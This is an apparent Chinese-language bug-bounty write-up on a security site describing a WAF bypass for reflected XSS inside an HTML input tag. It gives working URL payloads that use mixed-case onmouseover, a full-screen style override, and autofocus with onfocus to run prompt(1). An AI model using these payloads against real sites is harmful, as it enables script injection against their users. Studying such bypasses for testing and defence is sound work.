长亭百川云 - 文章详情

长亭百川云

技术讨论漏洞库IP 威胁情报在线工具

在input标签中如何绕过waf?

漏洞推送

40

2024-07-13

原文链接

在几个星期以前,我碰到了一个xss 漏洞

url: https://target.com/?product\_name=test

在源码中显示的是

<input type="text" name="product_name" id="product_name" value="test"  style="height: 25px; width: 200px;">

尝试直接注入script标签,来进行利用

https://target.com/?product_name=test"<script>alert(1)</script><

但是waf直接给script过滤了

<input type="text" name="product_name" id="product_name" value="test"  style="height: 25px; width: 200px;">

我尝试了很多其他payload,比如img等等,但是都直接被waf过滤了。

但是我发现这个标签是在input标签中的,于是我想到了onmouseover 事件来进行利用

onmouseover事件会在鼠标指针 移动到指定的对象上时触发事件发生

payload如下:

https://target.com/?product_name=test"%20oNmOuSeOvEr=prompt(1)//>

成功注入,并没有被拦截。但是比较鸡肋的是,这个事件要求用户把鼠标移动到这个小小的input上才能触发。

然后我注意到这个input后面跟的是style标签,可以用于设置元素的大小。

并且在html中先定义的属性才会生效,例如

我们可以看到元素b是没有生效的。

于是我们可以通过在前面写style,让input覆盖满整个屏幕。

payload如下:

https://target.com?product_name=admin%22style=%22height:%20100%;width:100%;position:%20absolute;top:%200;left:%200;z-index:%209999;%22%20oNmOuSeOvEr=prompt(1)//%3E

这样只要鼠标移动到网页里面就会触发prompt

稍微接近于可用状态了,后来有另一个大佬提出了一个更为完美的解决方案,通过autofocus加oNfocUs两个属性一起

onfocus 事件在对象获得焦点(光标)时发生

autofocus 设置了该属性 , 可以自动进行聚焦 , 页面加载完毕后 , 自动聚焦到设置了该属性的表单

完整payload如下:

https://target.com?product_name=admin") autofocus oNfocUs="prompt(1)"//

相关推荐
热门产品
雷池 WAF 社区版
IP 威胁情报
网站安全监测
百川漏扫服务
云堡垒机
百川云
技术文档
开发工具
漏洞库
网安百科
安全社区
CT STACK 安全社区
雷池社区版
XRAY 扫描工具
长亭科技
长亭科技官网
万众合作伙伴商城
长亭 BBS 论坛
友情链接
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服
Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2